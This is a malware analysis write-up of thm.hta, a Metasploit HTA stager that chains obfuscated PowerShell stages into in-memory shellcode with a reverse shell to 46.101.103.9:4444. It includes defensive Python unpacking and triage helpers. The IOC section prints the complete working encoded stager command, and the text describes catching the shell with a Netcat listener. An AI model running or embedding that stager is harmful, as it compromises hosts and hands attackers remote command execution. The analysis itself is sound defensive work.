thm.hta – MetaSploit Shellcode Payload

December 28, 2023

SHA256: f94702fecc39579eab7f51a1519495c78d2413daa652a9e989414af2528926e6

Summary

thm.hta is an HTA file containing VBScript that creates a Wscript.Shell object and uses it to run a Base64 encoded PowerShell command. That command is a second PowerShell script, which uses System.Diagnostics.ProcessStartInfo to launch a further PowerShell process whose arguments carry a Base64 encoded, Gzip compressed third script. The decoded and decompressed third script holds a final Base64 encoded payload that is decoded into a byte array, written into RWX memory of the running process and executed in a new thread. The shellcode attempts to establish a reverse shell to 46.101.103.9 on port 4444.

Analysis

The initial HTA file contains VBScript. The script creates a Wscript.Shell object, stored in the variable eDp, and a Scripting.FileSystemObject, stored in kxP1eY. kxP1eY is used to build the file path of powershell.exe, and eDp is used to run PowerShell with the Base64 encoded script. The "-nop" parameter ensures no PowerShell profile is loaded, "-w hidden" sets the window style to hidden so the script runs quietly in the background, and "-e" tells PowerShell to execute the encoded command. Note that "-e" expects Base64 of a UTF-16LE string, so the blob has to be decoded as UTF-16LE rather than ASCII to read it.

Decoding the string from Base64 (as UTF-16LE) shows additional PowerShell code.

This script creates a System.Diagnostics.ProcessStartInfo object, stored in $s. The object's FileName is set to powershell.exe (via the C:\Windows\sysnative path, the alias a 32-bit process uses to reach the 64-bit System32 directory) and its Arguments are set to run a script block with "-nop -w hidden -c". The script block wraps the Base64 decoded string in a MemoryStream, passes it through a GzipStream in Decompress mode, reads the result with a StreamReader and hands the text to [scriptblock]::create for execution. Before decoding, the -f format operator is applied to the string, replacing {0} with '=' and {1} with 'm'; together with the '+' concatenation that splits the literal into pieces, this exists only to obfuscate the Base64 and defeat simple string matching.

Decoding and decompressing the string results in yet more PowerShell code.
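The unpacking of both encoded stages (the UTF-16LE "-e" command and the concatenated, -f formatted, Base64 + Gzip "-c" script block) as a script rather than a manual CyberChef recipe. This is an added Python example, not code from the original write-up: it assumes the two -f arguments are '=' and 'm' as in this sample and that the literal uses only 'x'+'y' concatenation. The stage it unpacks is built in-process by build_sample()/build_command(), so it runs without the bytes from thm.hta.

```python
"""Unpack the layered PowerShell stager: -e (Base64 of UTF-16LE) and the
-c block (string concat -> -f placeholders -> Base64 -> Gzip).
Added example; the sample stage is constructed in-process, not thm.hta's."""
import base64
import gzip
import re

FORMAT_ARGS = ("=", "m")  # the two -f arguments used by the stager


def decode_encoded_command(b64: str) -> str:
    """Layer 1: powershell -e takes Base64 of UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")


def strip_concat(literal: str) -> str:
    """Undo 'x'+'y' concatenation; a '+' may even split a {1} placeholder."""
    return literal.replace("'+'", "").strip("'")


def apply_format(template: str, args=FORMAT_ARGS) -> str:
    """Mimic the -f operator for plain positional {n} placeholders."""
    for i, arg in enumerate(args):
        template = template.replace("{%d}" % i, arg)
    return template


def unpack_stage(literal: str, args=FORMAT_ARGS) -> str:
    """Layer 2: concat -> -f -> Base64 -> Gzip -> script text."""
    b64 = apply_format(strip_concat(literal), args)
    return gzip.decompress(base64.b64decode(b64)).decode("utf-8")


# Matches ((('...'+'...')-f'=','m') as it appears in the -c command line.
STAGE_RE = re.compile(r"\('(.+?)'\)\s*-f\s*'([^']*)'\s*,\s*'([^']*)'", re.S)


def unpack_command_line(cmd: str) -> str:
    """Locate the -f expression inside a full powershell -c command line."""
    m = STAGE_RE.search(cmd)
    if not m:
        raise ValueError("no -f formatted Base64 literal found")
    literal, *args = m.groups()
    return unpack_stage(literal, tuple(args))


def encode_command(text: str) -> str:
    """Forward direction of layer 1 (constructed helper for the example)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def build_sample(script: str, args=FORMAT_ARGS, chunk: int = 11) -> str:
    """Forward direction of layer 2, constructed for this example: gzip,
    Base64, swap each -f argument for its placeholder, then split with '+'."""
    b64 = base64.b64encode(gzip.compress(script.encode("utf-8"))).decode("ascii")
    for i, arg in enumerate(args):
        b64 = b64.replace(arg, "{%d}" % i)
    pieces = [b64[i:i + chunk] for i in range(0, len(b64), chunk)]
    return "'" + "'+'".join(pieces) + "'"


def build_command(literal: str) -> str:
    """Wrap a literal in the same -c decompression one-liner the stager uses."""
    return (
        "powershell.exe -nop -w hidden -c &([scriptblock]::create((New-Object "
        "System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object "
        "System.IO.MemoryStream(,[System.Convert]::FromBase64String((("
        + literal + ")-f'=','m')))),[System.IO.Compression.CompressionMode]::Decompress"
        "))).ReadToEnd()))"
    )


if __name__ == "__main__":
    inner = "$c = New-Object System.Net.Sockets.TCPClient('10.0.0.5', 4444)"  # constructed
    cmd = build_command(build_sample(inner))
    print(unpack_command_line(cmd))
    print(decode_encoded_command(encode_command(cmd)))
```

For a real sample, paste the "-c" command from the IOC section into unpack_command_line and the "-e" blob into decode_encoded_command; the recovered stage should then be fed back into the same functions until no further encoded layer remains.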

The first two functions, moE and zcG, give PowerShell the ability to call Win32 API functions: moE resolves a function's address (the GetModuleHandle and GetProcAddress strings below belong to it), and zcG builds a delegate type so the function can be called with the right parameters and return type. The variable $f7 holds a Base64 encoded payload that is decoded into a byte array containing the shellcode that is ultimately written into memory and executed. The script calls VirtualAlloc to allocate memory in the running process: the allocation type 0x3000 is MEM_COMMIT | MEM_RESERVE (0x1000 | 0x2000), and the protection 0x40 is PAGE_EXECUTE_READWRITE, so the region is RWX. The Copy call fills the region with the shellcode, CreateThread starts a new thread at its address, and WaitForSingleObject blocks the script until that thread finishes; its timeout of 0xffffffff is INFINITE, so the hosting PowerShell process stays alive for as long as the shellcode runs.

We can use CyberChef to Base64 decode the shellcode and save the raw bytes to a file.
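The two steps above (recovering the $f7 payload from the decoded stage and reading the loader's constants) as an added Python example, not code from the write-up. STAGE is a constructed stand-in whose shape mirrors the loader the analysis describes; the Get-Win32Api lines, every variable name other than $f7, and the payload bytes are made up and are not the thm.hta shellcode.

```python
"""Triage a decoded PowerShell shellcode-runner stage: extract the Base64
payload handed to FromBase64String and decode the Win32 constants it uses.
Added example; STAGE is a constructed stand-in, not the real decoded script."""
import base64
import re

# Win32 constants the loader passes, decoded for the report.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROTECT = {0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE"}
INFINITE = 0xFFFFFFFF
LOADER_APIS = ("VirtualAlloc", "VirtualProtect", "CreateThread", "WaitForSingleObject")

SAMPLE_PAYLOAD = bytes(range(16)) * 4  # constructed filler, not real shellcode
STAGE = """
$va   = Get-Win32Api kernel32.dll VirtualAlloc        # constructed stand-ins for moE/zcG
$ct   = Get-Win32Api kernel32.dll CreateThread
$wfso = Get-Win32Api kernel32.dll WaitForSingleObject
[Byte[]] $f7 = [System.Convert]::FromBase64String("%s")
$addr = $va.Invoke([IntPtr]::Zero, $f7.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($f7, 0, $addr, $f7.Length)
$thread = $ct.Invoke([IntPtr]::Zero, 0, $addr, [IntPtr]::Zero, 0, [IntPtr]::Zero)
$wfso.Invoke($thread, 0xffffffff)
""" % base64.b64encode(SAMPLE_PAYLOAD).decode("ascii")

B64_RE = re.compile(r'FromBase64String\(\s*["\']([A-Za-z0-9+/=]{32,})["\']')
HEX_RE = re.compile(r"\b0x([0-9a-fA-F]+)\b")


def extract_payload(stage: str) -> bytes:
    """Decode the longest Base64 literal handed to FromBase64String."""
    blobs = B64_RE.findall(stage)
    if not blobs:
        raise ValueError("no FromBase64String literal found")
    return base64.b64decode(max(blobs, key=len))


def decode_flags(value: int, table: dict) -> str:
    """Render a bitmask as OR-ed symbolic names (falls back to hex)."""
    names = [name for bit, name in table.items() if (value & bit) == bit]
    return "|".join(names) if names else hex(value)


def loader_indicators(stage: str) -> dict:
    """Summarise the shellcode-runner pattern: APIs present, constants decoded."""
    apis = [a for a in LOADER_APIS if a in stage]
    consts = {int(h, 16) for h in HEX_RE.findall(stage)}
    return {
        "apis": apis,
        "alloc_type": decode_flags(0x3000, MEM_FLAGS) if 0x3000 in consts else None,
        "protect": PAGE_PROTECT.get(0x40) if 0x40 in consts else None,
        "waits_forever": INFINITE in consts,
        # RWX allocation plus a new thread is the classic in-memory runner.
        "shellcode_runner": ("VirtualAlloc" in apis and "CreateThread" in apis
                             and 0x3000 in consts and 0x40 in consts),
    }


if __name__ == "__main__":
    payload = extract_payload(STAGE)
    print(len(payload), "payload bytes")          # write to disk with open(...,"wb") for scdbg
    print(loader_indicators(STAGE))
```

Point extract_payload at the real decoded stage to get the same bytes CyberChef produces, then write them out for scdbg; the indicator dictionary is the part worth carrying into a detection rule, since RWX VirtualAlloc followed by CreateThread is rare in benign scripts.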

Running scdbg against the file does not surface any obvious API calls or indicators, so the shellcode needs further analysis.

When the shellcode executes, PowerShell attempts to connect to 46.101.103.9 on port 4444.

If we assign the C2 address 46.101.103.9 to an analysis host on an isolated network and open a Netcat listener on port 4444 (nc -lvnp 4444), the payload connects back and provides a remote shell with full command execution.
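A static complement to the dynamic confirmation above, as an added Python example that is not part of the original write-up. It rests on an assumption about the usual Metasploit stager layouts and must be treated as a heuristic: the x86 reverse_tcp block pushes the address as push <ip> (68 ii ii ii ii) immediately followed by the sockaddr push (68 02 00 pp pp), and the x64 block loads the whole sockaddr_in with mov r64, imm64 (49 B8+r 02 00 pp pp ii ii ii ii); in both, 02 00 is AF_INET and pp pp the port in network byte order. The byte strings below are constructed around the write-up's IOC values and are not the thm.hta shellcode.

```python
"""Recover the C2 socket from Metasploit-style reverse_tcp shellcode.
Added example; heuristic keyed on the stager's sockaddr_in immediates.
The SAMPLE_* blobs are constructed, not the real payload."""
import re
import socket
import struct

# x86: push <ip> ; push 0xPPPP0002   (68 ii ii ii ii 68 02 00 pp pp)
X86_SOCKADDR = re.compile(rb"\x68(.{4})\x68\x02\x00(.{2})", re.DOTALL)
# x64: mov r8..r15, imm64            (49 B8+r 02 00 pp pp ii ii ii ii)
X64_SOCKADDR = re.compile(rb"\x49[\xb8-\xbf]\x02\x00(.{2})(.{4})", re.DOTALL)


def find_c2(shellcode: bytes) -> list:
    """Return (arch, ip, port) candidates; an empty list means no layout matched."""
    hits = []
    for m in X86_SOCKADDR.finditer(shellcode):
        hits.append(("x86", socket.inet_ntoa(m.group(1)),
                     struct.unpack(">H", m.group(2))[0]))
    for m in X64_SOCKADDR.finditer(shellcode):
        hits.append(("x64", socket.inet_ntoa(m.group(2)),
                     struct.unpack(">H", m.group(1))[0]))
    return hits


def looks_like_msf_x86(shellcode: bytes) -> bool:
    """Metasploit x86 stagers open with cld; call block_api (FC E8)."""
    return shellcode[:2] == b"\xfc\xe8"


def sockaddr_in(ip: str, port: int) -> bytes:
    """AF_INET sockaddr_in prefix as it sits in memory: family, port (BE), ip."""
    return b"\x02\x00" + struct.pack(">H", port) + socket.inet_aton(ip)


# Constructed samples: filler bytes around the one instruction sequence we key on.
SAMPLE_X86 = (b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5" + b"\x90" * 24
              + b"\x68" + socket.inet_aton("46.101.103.9")
              + b"\x68" + sockaddr_in("46.101.103.9", 4444)[:4]
              + b"\x89\xe6")
SAMPLE_X64 = (b"\xfc\x48\x83\xe4\xf0\xe8" + b"\x90" * 24
              + b"\x49\xbc" + sockaddr_in("46.101.103.9", 4444)
              + b"\x41\x54")


if __name__ == "__main__":
    for name, blob in (("x86 sample", SAMPLE_X86), ("x64 sample", SAMPLE_X64)):
        print(name, find_c2(blob), "msf x86 prologue:", looks_like_msf_x86(blob))
```

Run find_c2 over the bytes exported from CyberChef; any hit is a candidate only, and the address should be confirmed the way the write-up does (a listener on an isolated host) or in a debugger, since ten-byte patterns can collide with unrelated code and encoded or custom stagers will not match at all.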

IOCs

SHA256 File Hash:

f94702fecc39579eab7f51a1519495c78d2413daa652a9e989414af2528926e6

File Name:

thm.hta

Network:

46.101.103.9

Port 4444

Commands:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e <Base64 encoded command omitted>

"C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIALTyh2UCA7VWbW/iOBD+vtL+h2iFRNBRXvqy'+'7'+'VaqdE5ISlhoSQOhhUWrkJjErRND4hTo3v73GyektFp61ztpLSFie2Y8fuaZGc/T'+'yOWERVLINOnHxw/Sd'+'vSd2AklucRve2fdqlSianv5UNntl54ute/ShSRP0GLRYqFDoun5uZrGMY54Pq9dYo6SBIczSnAiV6S/pFGAY3xwPbvHLpd+SKXvtUvKZg7di{1}1Uxw2wdIAiT+x1{1}esI32rWghIul799K1c{1}B81pTVu{1}Dk3ksrVJOA5rHqXlivSzIg4cbBZYLveIG'+'7OEzXltRKKjw9owSpw5vgJrj7iHecC8pAyX2V0nxjyNo/xWwkwuJJfhsx8zF3lejJOkXJU{1}4oDJdPqnPN{1}efpN'+'GnIS4ZkQcx2xh4fiRuDiptZ3Io/gGz6egZfGYRP60UgGxR/aA5VKUUlqV/osZ+QqvCuzeqyS/VAKpPo8rVQjrnnv2{1}JdSnGuW9ziaU6EC45kOAOFPgeK8INGTe7{1}HRLuFYkyyHQxOy32WkEz3Q{1}pUpR4c73AWb2BaGsQpr'+'kyfIZdK99fX1fcaaxaaQo+hNixNbEa86c7AKwaU3L4QeZvNLTwnEW5tIickbkFYeV9Q8JziDI9aIXYF/snl7Qb2Wphi3+ECZsGNX9S0kPBnXSUl1MMxciGwCXgFMa+8diaPnFw2oh4OAbt8D{1}QtzSFNcCG9TY1NcbqYg1BZpU6SVKV+CnnqViULOxR7VQlFCdluoZSz7LO8c7'+'eXUk5cJ+GFuWnlFZjbQ1UWJTxOXYgpADCwFtglDhV4VKU28bCysYhfHF7ei4bqUArJA5YeIRqwIlCwuGBKDH4KVlRqFuZGuKA4BJGsaOjU8aFEbDMkY5bjY6+818siDXLOC1AKNF74CJG2KONVySYxhwIkABbM+j8u/Fp5w'+'Bc1xtuwyEV{1}TZQNF9wvzU8FO7fgZFDEHGDQYxYqToI/H+cVRv5U10jrpN9iKwRD029MW7GG9tjo'+'eR1qGdy600h3GAQGaRo+zDdDze/zxuLrYNDuWK02ilvrYI6MxNDaysZ'+'sKshtk1O7owyHoEfUrn{1}/NpCndn3DhwMUI3CVxrjhKw1d7VpKoJEG8i2zb'+'R43x0b9jCrkyTIs1B4923+2qx0ft2/XA3TV66BAv/b05'+'qGe6T8I/fHDZbelZXNXzM27RCManKPpd6Yd4JG9UEaaPjbtheH/sfJNu1s/1gMF1g2y7i7sOox{1}s/MYeU89evbUA3dNe9wheGz4eOMjEyHrLqLWbKUiRXe7oR2pQ30Iaw8DI1qbs0XP29y161/sHsELhkwNIZ1CNobIWbXqTVsxxZ3gh6x+HVlGpG7/FXMWL1tf6j7oGsT1lhr4DDYJ7J2Ys+V4c'+'XsTiD3fvUEI/LJ{1}wf1sZCKUx8yE{'+'1}BkEd27tpnfVc5Vly6bK8Lp7Nk48raObChqSqxvVvFv7CgObIWwrw1yvUz8T31F9ox12VsMN/C4/Y3dVDx7rNuBvgY9fyepESX3Sbo/gHrPHFXc6I/ArpLNDL/PrzGR9ND5TWev0uD3U04Y7cMMvS3F/4sX1pnlx8Q'+'koOh{1}SiB8dTkvLa1G+P34oefrgBU/fak89J04ChwJ/oe8U9UNnsb7tI31GhIYsi0fJA44jTKGJQ5svUg9RylzRyETDgR6adzbRaIdG5tG+r'+'4r0LFjZ9bdi6fx8DD'+'6K{1}nla6+LI5'+'0G1sT5qNKApNdaN4yxn338vlS02MpiqiqY{1}UMkN08ww2CJzSZZ/O0zwdOFQRN8E6i3M4OQHqHpQg/NiJJBTGKMvccsv9cyAHWoAVxMuPRFPFiAGKB/gpVTiop{1}/fByUkv5p/+S3s{1}VbUAP48/6FLbu1f9h9F4Ma1QyaX1ZfL7xoQ7/v/iOHcBC0oDFQnD9S9sKwzY8Xwc1iAwkw3w7xeL9O+cE'+'VPAaz1vQ3A3E8HjgMAAA{0}')-f'=','m')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

Strings

CreateObject("Wscript.Shell")
CreateObject("Scripting.FileSystemObject")
powershell.exe -nop -w hidden -e
-nop -w hidden -c
System.Diagnostics.ProcessStartInfo
System.Diagnostics.Process
System.dll
Microsoft.Win32.UnsafeNativeMethods
GetProcAddress
GetModuleHandle
ReflectedDelegate
InMemoryModule
Invoke
FromBase64String
VirtualAlloc
VirtualProtect
CreateThread
WaitForSingleObject